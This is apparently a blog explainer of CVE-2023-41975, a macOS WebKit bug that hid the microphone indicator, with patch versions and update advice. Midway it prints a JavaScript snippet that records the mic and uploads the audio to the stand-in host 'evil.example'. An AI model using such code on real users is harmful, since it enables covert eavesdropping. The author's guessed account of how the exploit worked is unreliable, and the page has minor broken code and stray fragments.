In late 2023, Apple patched a sneaky vulnerability, tracked as CVE-2023-41975, that allowed shady websites to access your Mac’s microphone, all without showing you the usual orange indicator that’s supposed to alert you when the mic is being used. If you’re using macOS Sonoma 14.1, Ventura 13.6.1, or Monterey 12.7.1 (or newer), you’re protected. If not—you might want to read on.
What Was CVE-2023-41975?
CVE-2023-41975 is a privacy flaw found in Apple's WebKit, the core engine behind Safari and other browsers on macOS. Normally, when a website wants to use your microphone, you’ll see a prompt for permission, and if it’s granted, a small orange indicator lights up in your menu bar (similar to the green dot for the camera).
With this bug, a website could still access the microphone, but the indicator wouldn’t light up, making it way too easy for a site to eavesdrop on you without you having a clue.
Apple’s official advisory:
https://support.apple.com/en-us/HT213961
How Did the Exploit Work?
Apple hasn’t released the juicy technical details publicly, but based on the issue description, this looks like a classic case of the UI and permission handling code not linking up properly. Websites could call JavaScript APIs to access the mic, and due to a glitch (or leftover code), the indicator just didn’t appear. Meanwhile, your mic was live.
Here’s a simplified code snippet that shows how a malicious website could take advantage
navigator.mediaDevices.getUserMedia({ audio: true })
.then(stream => {
// At this point, your mic is recording
// No orange indicator on affected systems!
const audioTracks = stream.getAudioTracks();
const mediaRecorder = new MediaRecorder(stream);
mediaRecorder.ondataavailable = event => {
// Upload your voice data to a remote server
uploadAudio(event.data);
};
mediaRecorder.start();
})
.catch(error => {
// User denied permission? Can't record.
});
function uploadAudio(blob) {
fetch('https://evil.example/upload';, {
method: 'POST',
body: blob
});
}
In theory, the orange indicator was supposed to show when this code ran and access was granted. On vulnerable systems, it would not.
macOS Sonoma prior to 14.1
Patch notes from Apple:
- macOS Sonoma 14.1 Release Notes
- macOS Ventura 13.6.1 Release Notes
- macOS Monterey 12.7.1 Release Notes
The fix?
Apple quietly removed the vulnerable code. In their own words:
> "This issue was addressed by removing the vulnerable code."
How Serious Was CVE-2023-41975?
High risk.
All it took was one shady website visit
Since browsers like Chrome and Firefox use system libraries on macOS, this could have affected multiple browsers, not just Safari.
Use Strict Browser Privacy Settings
- Always review and block mic/camera requests when you don't need them
References and Further Reading
- Apple Security Update Advisory for CVE-2023-41975
- Mitre CVE Record for CVE-2023-41975
- How to control access to your microphone on Mac (Apple Support)
The Bottom Line
CVE-2023-41975 is one of those “I can’t believe that could happen!” bugs. The microphone privacy indicator is supposed to keep you safe, but a simple web page could sidestep all that. Apple’s response was swift—pulling the bad code and releasing a fix across supported macOS versions. If you haven’t already, update your Mac today.
Stay safe, keep your Mac updated, and always watch out for suspicious sites asking for mic or camera access!
Timeline
Published on: 10/25/2023 19:15:09 UTC
Last modified on: 11/02/2023 15:22:55 UTC